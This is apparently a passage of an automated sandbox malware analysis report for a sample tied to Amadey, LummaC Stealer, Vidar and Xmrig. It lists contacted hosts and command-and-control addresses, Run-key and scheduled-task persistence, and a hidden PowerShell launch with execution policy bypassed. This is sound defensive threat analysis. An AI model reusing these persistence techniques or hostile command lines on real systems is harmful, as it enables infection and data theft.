                                                                                                                        https://github.com/pypa/wheelLoaderClient.exe, 0000002E.00000003.269805743524.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.python.org/dev/peps/pep-0427/LoaderClient.exe, 0000002E.00000003.269805743524.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://payments.google.com/payments/v4/js/integrator.jst5abhIx.exe, 0000002B.00000003.269667370374.000001B3EE94D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://secure.eicar.org/eicar.comb1dc05533c.exe, 00000014.00000003.269558571952.0000000003BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://chrome.google.com/webstoreNAzVRM7c.exe, 00000029.00000003.269621589022.00000247ADEC9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADECC000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=b1dc05533c.exe, 00000014.00000003.269570020702.00000000039F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://drive.google.com/uc?id=dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://ocsp.rootca1.amazontrust.com0:b1dc05533c.exe, 00000014.00000003.269582770018.0000000003A0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://xmrig.com/wizardIntel_PTT_EK_Recertification.exe, 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000023.00000002.269556564358.00000001402DD000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://pki.goog/repository/0b1dc05533c.exe, 00000014.00000003.269582770018.0000000003A0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://drive.google.com/drive/settingscrxvAzVRM7c.exe, 00000029.00000003.269620144384.00000247ADECC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.ecosia.org/newtab/b1dc05533c.exe, 00000014.00000003.269557138007.0000000003A2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://drive-daily-1.corp.google.com/t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://drive-daily-5.corp.google.com/t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://img.shields.io/badge/skeleton-2024-informationalLoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://drive.google.com/VAzVRM7c.exe, 00000029.00000003.269621589022.00000247ADEC9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADECC000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76LoaderClient.exe, 0000002F.00000003.269855268886.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883225373.00000178EAE47000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269868352131.00000178EAE3C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852733549.00000178EAE35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.eicar.org/download-anti-malware-testfile/Downloadb1dc05533c.exe, 00000014.00000003.269558571952.0000000003BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.google.com/tdwVrTdy.exe, 00000026.00000003.269576528251.00000224326A6000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576629725.00000224326A7000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575078876.0000022432692000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://chrome.google.com/webstoreBdwVrTdy.exe, 00000026.00000003.269574618681.0000022432672000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.000002243267B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576282041.000002243267B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.google.com/sAzVRM7c.exe, 00000029.00000003.269621355263.00000247ADEE2000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621849034.00000247ADEE2000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620565239.00000247ADED9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620670719.00000247ADEDC000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622439350.00000247ADEE2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://drive.google.com/drive/settingsVAzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620990445.00000247ADECF000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621355263.00000247ADED7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://ipinfo.io/dwVrTdy.exe, 00000026.00000002.269640823894.0000022432619000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000002.269640823894.0000022432659000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654360187.0000025635629000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269664887145.0000025635629000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADF08000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE8C8000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269685044935.000001B3F0753000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://docs.google.com/UAzVRM7c.exe, 00000029.00000003.269621589022.00000247ADEC9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADECC000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.google.com/vt5abhIx.exe, 0000002B.00000003.269664517694.000001B3EE912000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664911899.000001B3EE938000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.google.com/ut5abhIx.exe, 0000002B.00000003.269664517694.000001B3EE912000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664911899.000001B3EE938000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://chrome.google.com/webstoreIdwVrTdy.exe, 00000028.00000003.269595629729.0000025635684000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://chrome.google.com/webstoreGAzVRM7c.exe, 00000029.00000003.269621589022.00000247ADEC9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADECC000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://support.mozilla.org/en-GB/products/firefoxgro.allizom.troppus.b1dc05533c.exe, 00000014.00000003.269584211913.0000000003EE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://crl4.digLoaderClient.exe, 0000002E.00000003.269792848537.0000023A40628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://drive-preprod.corp.google.com/t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://google.com/mailLoaderClient.exe, 0000002F.00000003.269855268886.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852733549.00000178EAE35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://img.shields.io/pypi/v/importlib_metadata.svgLoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://github.com/jaraco/jaraco.functools/issues/5LoaderClient.exe, 0000002F.00000002.269881633471.00000178EAAA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://support.mozilla.org/en-GB/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=fireb1dc05533c.exe, 00000014.00000003.269584211913.0000000003EE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://www.rfc-editor.org/info/rfc7253LoaderClient.exe, 0000002F.00000003.269851106200.00000178EAEA7000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269866340442.00000178EAEAB000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883610008.00000178EAF0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://drive.google.com/drive/settings8dwVrTdy.exe, 00000028.00000003.269592961408.0000025635608000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://sandbox.google.com/t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665172986.000001B3EE8F5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665002237.000001B3EE8EB000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666848962.000001B3EE8FB000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664399362.000001B3EE8CD000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667370374.000001B3EE94D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://gemini.google.com/app?q=b1dc05533c.exe, 00000014.00000003.269557138007.0000000003A2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://drive.google.com/xt5abhIx.exe, 0000002B.00000003.269667123223.000001B3EE93D000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269673713462.000001B3EE955000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667320015.000001B3EE954000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE95F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                              185.215.113.43
                                                                                                                                                                                              unknownPortugal
                                                                                                                                                                                              206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                              34.117.59.81
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                              116.203.12.241
                                                                                                                                                                                              unknownGermany
                                                                                                                                                                                              24940HETZNER-ASDEfalse
                                                                                                                                                                                              185.215.113.16
                                                                                                                                                                                              unknownPortugal
                                                                                                                                                                                              206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                              149.154.167.99
                                                                                                                                                                                              unknownUnited Kingdom
                                                                                                                                                                                              62041TELEGRAMRUfalse
                                                                                                                                                                                              149.154.167.220
                                                                                                                                                                                              unknownUnited Kingdom
                                                                                                                                                                                              62041TELEGRAMRUfalse
                                                                                                                                                                                              172.67.139.78
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              172.67.192.146
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              64.233.176.101
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              74.125.136.132
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              31.41.244.11
                                                                                                                                                                                              unknownRussian Federation
                                                                                                                                                                                              61974AEROEXPRESS-ASRUfalse
                                                                                                                                                                                              127.1.10.1
                                                                                                                                                                                              unknownunknown
                                                                                                                                                                                              unknownunknowntrue
                                                                                                                                                                                              IP
                                                                                                                                                                                              127.0.0.1
                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                              Analysis ID:1575244
                                                                                                                                                                                              Start date and time:2024-12-15 00:18:02 +01:00
                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                              Overall analysis duration:0h 22m 32s
                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                              Report type:full
                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                                              Run name:Suspected VM Detection
                                                                                                                                                                                              Number of analysed new started processes analysed:63
                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                              Technologies:
                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                              Sample name:file.exe
                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                              Classification:mal100.rans.troj.spyw.evad.mine.winEXE@118/196@0/13
                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                              HCA Information:Failed
                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                              • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                              • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe
                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                              • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                                                                              • VT rate limit hit for: file.exe
                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                              00:20:13Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              00:21:15Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                              00:21:23Task SchedulerRun new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                              00:21:25Task SchedulerRun new task: MyBootTask path: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                              00:21:36AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                              00:21:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                              00:22:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\CDD898AC6E801019693163\CDD898AC6E801019693163.exe
                                                                                                                                                                                              00:22:06Task SchedulerRun new task: Gxtuum path: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                              00:22:11Task SchedulerRun new task: defnur path: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                                                                                                                              00:22:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\CDD898AC6E801019693163\CDD898AC6E801019693163.exe
                                                                                                                                                                                              00:22:19Task SchedulerRun new task: user path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe s>-NoLogo -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\10009630142\asyno.ps1
                                                                                                                                                                                              00:22:25Task SchedulerRun new task: chromes path: "C:\Users\user\AppData\Roaming\chromes.exe"
                                                                                                                                                                                              00:22:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 614fa5846c.exe C:\Users\user\AppData\Local\Temp\1006489001\614fa5846c.exe
                                                                                                                                                                                              00:22:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 3a4323f24d.exe C:\Users\user\AppData\Local\Temp\1015360001\3a4323f24d.exe
                                                                                                                                                                                              00:23:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run d83815b520.exe C:\Users\user\AppData\Local\Temp\1006490001\d83815b520.exe
                                                                                                                                                                                              00:23:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run a4bd6a9bcb.exe C:\Users\user\AppData\Local\Temp\1015361001\a4bd6a9bcb.exe
                                                                                                                                                                                              00:23:41Task SchedulerRun new task: Test Task17 path: C:\ProgramData\lxwdah\qfpwc.exe
                                                                                                                                                                                              00:23:43AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 432b30086e.exe C:\Users\user\AppData\Local\Temp\1015362001\432b30086e.exe
                                                                                                                                                                                              00:24:00Task SchedulerRun new task: WORKGROUP path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe s>-NoLogo -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass "#yhlesig
                                                                                                                                                                                              00:24:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 5102d46fb9.exe C:\Users\user\AppData\Local\Temp\1015363001\5102d46fb9.exe
                                                                                                                                                                                              00:24:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 614fa5846c.exe C:\Users\user\AppData\Local\Temp\1006489001\614fa5846c.exe
                                                                                                                                                                                              00:24:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 3a4323f24d.exe C:\Users\user\AppData\Local\Temp\1015360001\3a4323f24d.exe
                                                                                                                                                                                              00:25:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run d83815b520.exe C:\Users\user\AppData\Local\Temp\1006490001\d83815b520.exe
                                                                                                                                                                                              00:25:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run a4bd6a9bcb.exe C:\Users\user\AppData\Local\Temp\1015361001\a4bd6a9bcb.exe
                                                                                                                                                                                              00:25:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 432b30086e.exe C:\Users\user\AppData\Local\Temp\1015362001\432b30086e.exe
                                                                                                                                                                                              00:26:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 5102d46fb9.exe C:\Users\user\AppData\Local\Temp\1015363001\5102d46fb9.exe
                                                                                                                                                                                              00:26:25AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dnsserv.vbs
                                                                                                                                                                                              00:26:45AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lbroker.vbs
                                                                                                                                                                                              00:29:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 55cd1cc254.exe C:\Users\user\AppData\Local\Temp\1015368001\55cd1cc254.exe
                                                                                                                                                                                              00:29:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 43c331c7e9.exe C:\Users\user\AppData\Local\Temp\1015369001\43c331c7e9.exe
                                                                                                                                                                                              18:21:01API Interceptor22183653x Sleep call for process: skotes.exe modified
                                                                                                                                                                                              18:21:23API Interceptor8x Sleep call for process: b1dc05533c.exe modified
                                                                                                                                                                                              18:21:26API Interceptor7x Sleep call for process: powershell.exe modified
                                                                                                                                                                                              18:22:08API Interceptor729105x Sleep call for process: graph.exe modified
                                                                                                                                                                                              18:23:06API Interceptor400490x Sleep call for process: cmd.exe modified
                                                                                                                                                                                              18:23:06API Interceptor472362x Sleep call for process: conhost.exe modified
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              185.215.113.43file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                                                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                              34.117.59.81file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                                                              Code%20Send%20meta%20Discord%20EXE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                                                              idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                                                              idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                                                              FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                                                              172.104.150.66.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                                                              VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                                                              UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                                                              I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                                                              licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                                                                                                                                              • ipinfo.io/ip
                                                                                                                                                                                              No context
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                                                                                                                                              • 185.215.113.16
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                              • 185.215.113.16
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                              • 185.215.113.16
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 185.215.113.16
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                              • 185.215.113.16
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                              • 185.215.113.16
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                              • 185.215.113.16
